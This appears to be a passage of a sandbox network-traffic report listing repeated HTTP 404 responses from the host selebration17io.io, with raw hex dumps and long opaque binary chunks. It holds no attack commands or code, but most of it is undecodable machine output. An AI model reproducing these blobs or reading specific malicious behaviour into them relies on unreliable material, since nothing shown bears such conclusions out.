cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 53 4a 70 76 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e cb eb ff 78 a9 57 db c4 0d 13 13 dc 3c e1 92 24 18 4f c5 03 01 d7 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 aa eb 96 be 21 51 61 79 a7 20 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d ab 3a f8 0e 98 eb 7e 71 eb 90 eb 1a d0 04 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 52 d4 12 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb 76 d0 46 99 48 15 ac af eb d9 55 3d af ba 68 92 ae e3 9d f3 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 98 e7 c3 8e 82 11 e8 e4 1f d0 bd 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 30 2d 85 1f d4 fc 74 91 9c 1b 06 f1 2c cc b2 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 48 9c 8a 8b e1 82 66 d7 9c dc c3 e0 2b 6d a8 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c 71 bf f5 52 48 d4 24 96 4d 6b e7 17 3f c4 f8 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 16 fc 7e 8a 22 d6 f6 c7 35 f3 73 07 03 d2 ff f9 d6 fb eb b2 8f 71 cd 4d 47 33 d1 b8 72 45 7c 1f 57 44 83 71 ca 3c 50 15 51 fe 08 82 cd 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed c5 06 b1 17 26 58 4a d4 6a 15 3e 17 21 4b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff b8 15 21 db 8f 0d 13 13 bf de 95 92 b8 c0 4e c5 03 a1 cb a1 61 7e de f5 69 f7 6f 17 56 ee af 9a a5 e4 bf a0 cd b9 dd 7a 60 08 3a 19 fc 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 43 42 5e b9 72 ce cc 23 b2 0f 7a 31 79 96 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 42 58 46 a0 08 b7 9f e3 ca cc 46 d9 e8 61 ac af ef d9 55 3d d1 ce 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac c4 06 f6 31 32 14 9b c7 9b 18 2f 3c 66 f1 4a 10 b1 1d fa 13 51 8c f2 63 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 15 8b fc d2 77 00 a0 cb 29 3e 28 e7 5b 1e f4 dd 1e 26 7f 11 ee c3 82 21 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 41 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 4d d7 b8 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f bd db fa e0 1b 86 71 cd 37 33 33 a3 bb fe 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 91 f4 5b fd 51 19 d0 c6 fc 14 b1 15 22 18 cb 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 71 6b f2 7b de 45 f7 ff 78 1d c4 db 49 69 1d 13 bf 1e e1 92 24 08 4f c5 03 07 af a1 39 64 de f5 69 c9 88 17 3a 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 80 66 bf 0a 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae 57 d5 01 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 0c 18 3c 27 d4 09 b4 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 d8 25 42 40 77 0b c4 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 78 d4 53 d4 87 21 96 b3 7e 81 1b 6f 83 cf 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 0f 73 32 b6 78 db c0 9b e6 1f e4 a6 3d 2b 9f 10 bd d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 ae b6 23 b1 8f c1 78 41 60 41 28 d2 fe 7d 1f d0 bd fc 7a 8f fe 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e 09 bc 70 d4 03 9b 3d 98 76 72 0f ca 82 eb 73 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 cd ce a0 88 c1 54 30 33 25 1b d4 a9 c3 a8 9e 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 20 Feb 2024 23:22:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 cd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c6 13 dc 19 df 8c ca 70 73 dc 31 bc af 4f ed 7f 40 93 d9 5e 6f 71 00 76 b9 3b 50 fd 96 bf eb bf 3a fc bb c9 27 97 8f c8 d4 60 66 b0 06 bd 89 72 e9 ac 67 f3 40 ee e5 a4 78 ee 09 b5 8f 36 03 cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 bd 40 70 b1 5b 23 5c 4a 8a f4 e9 5a 15 21 0b 5a a3 06 93 3a b6 3f c8 01 28 bf 48 15 d7 d9 53 53 fa 79 1a 9e 1d 09 52 2b 05 50 83 7b 7e 55 f7 ff 78 8d 54 db c4 0d 53 13 bf 0e e1 92 24 0a 4f c5 06 a1 ca a1 61 7e de f5 6c b9 18 17 7e 5f af 9a a5 b4 cf a0 c1 bd dd 7a e8 2b 48 19 e2 2c d5 2c 18 1a e5 96 be 35 51 61 9a d4 2e 7c 88 38 c8 48 6b a1 c0 4a 8a 03 fd ec 9e aa 7b ac 87 2f bd 61 81 cf 5c bf ca 34 fd f8 12 8c 35 6c c9 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 